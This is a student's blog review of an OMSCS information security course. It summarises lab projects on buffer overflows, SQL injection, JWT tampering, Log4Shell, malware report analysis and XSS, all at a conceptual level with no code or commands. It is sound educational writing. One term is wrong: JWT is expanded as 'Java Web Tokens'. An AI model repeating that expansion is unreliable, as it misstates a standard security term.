As my second course in OMSCS, I took “Introduction to Information Security” for the 2024 Summer semester, where I learned about information security through project-based assignments. I was able to study vulnerabilities such as Binary Exploitation, SQL Injection, Man in the Middle, and Log4Shell.
Overall
In my second class of OMSCS, I enrolled in “Introduction to Information Security” (IIS), where various topics related to information security were taught in a project format. Due to the shorter duration of the summer semester compared to spring and fall semesters, some classes had tighter deadlines and were more demanding. Therefore, since this was my first summer semester, I chose a course with a lighter workload. The assignments were essentially in a format similar to Capture the Flag (CTF), where we exploited vulnerabilities to obtain and submit flags. While past lecture videos were shared, they were not updated to match the assignments and there were no tests, so it was suggested that we could skip watching them. Consequently, I focused on the assignments for each topic, researching any unclear areas as I progressed.
During the 2024 Summer semester, I worked on assignments related to the following topics each week and practiced attack techniques using the VMs provided in the lectures. These attack methods were learned for the purpose of enhancing security, not for actual attacks, and the introduction of these methods here is intended to raise awareness of such attacks.
Binary Exploitation
Using a vulnerable program written in C language, I conducted Binary Exploitation to obtain flags. One of the methods of Binary Exploitation, Buffer Overflow, is an attack method that performs unintended execution by improperly implementing input, allowing the memory area to be incorrectly overwritten by the input. By debugging with gdb, I was able to learn about C language pointers and assembly. For generating payloads to trigger Binary Exploitation, I utilized the Python library Pwntools.
API Security
This section involved obtaining flags by exploiting various vulnerabilities in a sample API system. By using tools like Swagger and Postman, I became familiar with changing API parameters. Some tasks required rewriting JWT (Java Web Tokens), providing a good opportunity to deepen my understanding of JWT.
Database Security
The project covered Database Inference Attacks and SQL Injection. Regarding Database Inference Attacks, I linked anonymized information with specific personal information by combining publicly available web information in the sample. For SQL Injection, I executed unauthorized SQL queries from the application to obtain or update unintended information, thereby obtaining flags.
RSA Cryptography
This project focused mainly on RSA cryptography, which is categorized as a public-key cryptosystem, and involved tasks related to breaking encryption. Since RSA is based on mathematics, a solid understanding of mathematical concepts was necessary to comprehend its vulnerabilities. Learning about the principles of how RSA encryption works and what vulnerabilities exist was beneficial, especially given its widespread use in real-world applications.
What is RSA Cryptography? A Beginner’s Guide to Its Mechanism and Applications
Malware Analysis
In this project, I reviewed reports from the malware analysis tool JoeSandboxCloud and analyzed the malicious behavior of specific programs. The reports focused on CVE-2022-30190, Mirai, Nanocore, Emotet, and AgentTesla, and by examining them, I was able to observe how Windows APIs and the registry were manipulated, allowing me to answer related questions.
JoeSandboxCloud
Researching the behaviors of each malware beforehand helped as I read through the reports.
CVE-2022-30190
Mirai
Nanocore
Emotet
AgentTesla
Log4Shell
I also learned about Log4Shell, which gained significant attention in 2021, through this project. The vulnerability using the JNDI (Java Naming and Directory Interface) lookup feature in the Java logging library Log4j is referred to as Log4Shell and allowed for Remote Code Execution (RCE), which drew considerable interest. I built an LDAP Server in a virtual environment and exploited this vulnerability to execute a malicious Java class on a web application, obtaining a flag.
Verification Report on RCE Vulnerability in Apache Log4j (CVE-2021-44228)
By following the resources provided, I was able to set up the environment, including the LDAP Server, and deepen my understanding of Log4Shell. The explanatory videos were also helpful as I progressed through the assignments.
Solar, Exploiting Log4j
Log4J - CVE 2021-44228 (Log4Shell) - Exploitation & Mitigation
Man in the Middle
In this project, a background scenario was set up where I intercepted communications of a hacker group and analyzed their exchanges. A pcap file containing captured communications between hackers was provided. I analyzed the provided packet capture using Wireshark and Pyshark, observing how the hackers connected using different protocols such as TCP/IP, FTP, HTTP, and IRC. I checked the details of the packets in that context and read the communication content. To perform the analysis, it was essential to understand each protocol, so I learned how each protocol establishes a connection.
What is a Man-in-the-Middle Attack (MITM)?
Machine Learning
In this project, I classified malware using machine learning. The project started with necessary preprocessing tasks like One-Hot Encoding and Feature Engineering. I primarily used sklearn to perform classification using K-means, Logistic Regression, Random Forest, and Gradient Boosting. Additionally, since this was a classification task, I learned to calculate evaluation metrics like ROC from the basics. This project provided a good opportunity to experience the entire process from data preprocessing to prediction and evaluation using machine learning. Ultimately, I was required to classify using the following malware dataset and achieve a certain ROC threshold.
ClaMP (Classification of Malware with PE headers)
Web Security
This project focused on Cross-Site Scripting (XSS). Previously, it was an Extra Credit (grade remediation) project, but it seems it has now become a required project. However, since it was my final project and I was almost guaranteed an A, I only completed 1/4 of it, resulting in the lowest score among all projects so far. My lack of experience with frontend technologies like HTML and JavaScript contributed significantly to my struggle.
What is Cross-Site Scripting (XSS)? An Easy-to-Understand Explanation of the Attack Mechanism and Countermeasures
Reflection
SQL Injection and Man in the Middle are vulnerabilities I had heard of before, but I was not familiar with the actual steps involved in carrying out such attacks. However, through this assignment, I was able to gain a deeper understanding by attempting attacks in a virtual environment. By putting myself in the attackers’ shoes, I was able to better envision how to strengthen security from various perspectives, which was a significant takeaway.
Throughout this course, the wide array of topics such as assembler, debugger, SQL, Java, networks, and web technologies provided a good introductory framework. I plan to take courses in networking and operating systems in the future, and I believe this was a beneficial first step. Personally, I found the project on Binary Exploitation to be the most interesting, as it deepened my understanding of assemblers.